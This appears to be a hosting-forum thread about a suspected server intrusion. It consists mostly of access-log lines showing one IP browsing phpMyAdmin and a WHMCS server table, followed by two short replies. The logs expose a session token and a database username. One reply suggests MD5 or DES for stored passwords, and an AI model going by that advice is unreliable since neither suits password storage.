46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_host.png HTTP/1.1" 200 667 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_db.png HTTP/1.1" 200 390 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_sql.png HTTP/1.1" 200 748 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_status.png HTTP/1.1" 200 673 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_process.png HTTP/1.1" 200 512 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_export.png HTTP/1.1" 200 641 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/left_nav_bg.png HTTP/1.1" 200 215 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=left&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/database.png HTTP/1.1" 200 390 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=left&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:28 -0800] "GET /phpmyadmin/themes/pmahomme/jquery/jquery-ui-1.8.custom.css HTTP/1.1" 200 30846 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:28 -0800] "GET /phpmyadmin/js/cross_framing_protection.js?ts=1324498073 HTTP/1.1" 200 331 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:28 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:28 -0800] "GET /phpmyadmin/js/update-location.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:31 -0800] "-" 408 - "-" "-"
46.116.94.55 - - [22/Jan/2012:01:48:34 -0800] "GET /phpmyadmin/js/jquery/jquery-ui-1.8.custom.js?ts=1324498073 HTTP/1.1" 200 190765 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:34 -0800] "GET /phpmyadmin/js/jquery/jquery.sprintf.js?ts=1324498073 HTTP/1.1" 200 987 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:34 -0800] "GET /phpmyadmin/themes/pmahomme/img/window-new.png HTTP/1.1" 200 583 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:34 -0800] "GET /phpmyadmin/themes/pmahomme/img/tab_bg.png HTTP/1.1" 200 160 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:35 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_more.png HTTP/1.1" 200 1002 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:35 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_theme.png HTTP/1.1" 200 856 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:35 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_notice.png HTTP/1.1" 200 666 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:36 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_passwd.png HTTP/1.1" 200 435 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:36 -0800] "GET /phpmyadmin/themes/pmahomme/img/input_bg.gif HTTP/1.1" 200 162 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:36 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_lang.png HTTP/1.1" 200 743 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:38 -0800] "GET /phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e HTTP/1.1" 200 2663 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:38 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:39 -0800] "GET /phpmyadmin/js/update-location.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:40 -0800] "GET /phpmyadmin/js/common.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/cross_framing_protection.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/update-location.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/jquery/jquery-ui-1.8.custom.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/db_structure.js?ts=1324498073 HTTP/1.1" 200 3178 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/config.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/functions.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_props.png HTTP/1.1" 200 663 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/js/jquery/jquery.qtip-1.0.0.min.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_search.png HTTP/1.1" 200 615 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_asc.png HTTP/1.1" 200 201 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_browse.png HTTP/1.1" 200 566 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_select.png HTTP/1.1" 200 680 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_insrow.png HTTP/1.1" 200 228 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_empty.png HTTP/1.1" 200 363 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:42 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_drop.png HTTP/1.1" 200 715 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:43 -0800] "GET /phpmyadmin/themes/pmahomme/img/bd_browse.png HTTP/1.1" 200 200 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:43 -0800] "GET /phpmyadmin/themes/pmahomme/img/bd_select.png HTTP/1.1" 200 459 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:43 -0800] "GET /phpmyadmin/themes/pmahomme/img/bd_empty.png HTTP/1.1" 200 231 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:52 -0800] "GET /phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs HTTP/1.1" 200 275988 "https://mydomain.com/phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:52 -0800] "GET /phpmyadmin/js/messages.php?lang=en&db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e HTTP/1.1" 200 4965 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:52 -0800] "GET /phpmyadmin/themes/pmahomme/img/item_ltr.png HTTP/1.1" 200 162 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:53 -0800] "GET /phpmyadmin/themes/pmahomme/img/arrow_ltr.png HTTP/1.1" 200 184 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:53 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_print.png HTTP/1.1" 200 731 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:53 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_tblanalyse.png HTTP/1.1" 200 234 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:53 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_newtbl.png HTTP/1.1" 200 325 "https://mydomain.com/phpmyadmin/db_structure.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:54 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_sbrowse.png HTTP/1.1" 200 566 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:55 -0800] "GET /phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs HTTP/1.1" 200 52935 "https://mydomain.com/phpmyadmin/index.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:55 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_snewtbl.png HTTP/1.1" 200 733 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:00 -0800] "GET /phpmyadmin/js/cross_framing_protection.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:00 -0800] "GET /phpmyadmin/js/jquery/jquery-ui-1.8.custom.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/pMap.js?ts=1324498073 HTTP/1.1" 200 1915 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/functions.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0 HTTP/1.1" 200 36728 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e&db=efast_whmcs" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/update-location.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_chart.png HTTP/1.1" 200 541 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/sql.js?ts=1324498073 HTTP/1.1" 200 15945 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/config.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_views.png HTTP/1.1" 200 700 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/js/jquery/jquery.qtip-1.0.0.min.js?ts=1324498073 HTTP/1.1" 304 - "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_tbl.png HTTP/1.1" 200 714 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_tblexport.png HTTP/1.1" 200 641 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_tblimport.png HTTP/1.1" 200 629 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_fulltext.png HTTP/1.1" 200 244 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_edit.png HTTP/1.1" 200 444 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:02 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_success.png HTTP/1.1" 200 537 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:02 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_inline_edit.png HTTP/1.1" 200 618 "https://mydomain.com/phpmyadmin/sql.php?db=efast_whmcs&token=615a7de98fa1a9cddc19ce84bee62e8e&table=tblservers&pos=0" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:04 -0800] "GET /phpmyadmin/themes/pmahomme/img/tab_hover_bg.png HTTP/1.1" 200 1278 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:49:04 -0800] "GET /phpmyadmin/themes/pmahomme/img/marked_bg.png HTTP/1.1" 200 977 "https://mydomain.com/phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

Arieh · Jan 23, 2012

Yea hackers tend to just google their victims. If certain login panels and cms's are not necessary to be found in google you could consider restricting access to crawlers. Unless you're a specific target you'll dodge some bullets.

pucky · Jan 23, 2012

Looking at tblservers i see the password is set to text. Should be at least MD5 if not DES. Ill have to find out from WHMCS what its supposed to be. Does anyone know by chance? Still, he would have had to decrypt. I dont think thats easy to do.

Serious Direct Admin Security Concerns + UDP Attack Script Installed

Verified User

Super Moderator

Verified User

Super Moderator

Verified User

Verified User

Super Moderator

Verified User

Super Moderator

Super Moderator

Verified User

Super Moderator

Super Moderator

Verified User

Super Moderator

Verified User

Super Moderator

Verified User

Verified User

Verified User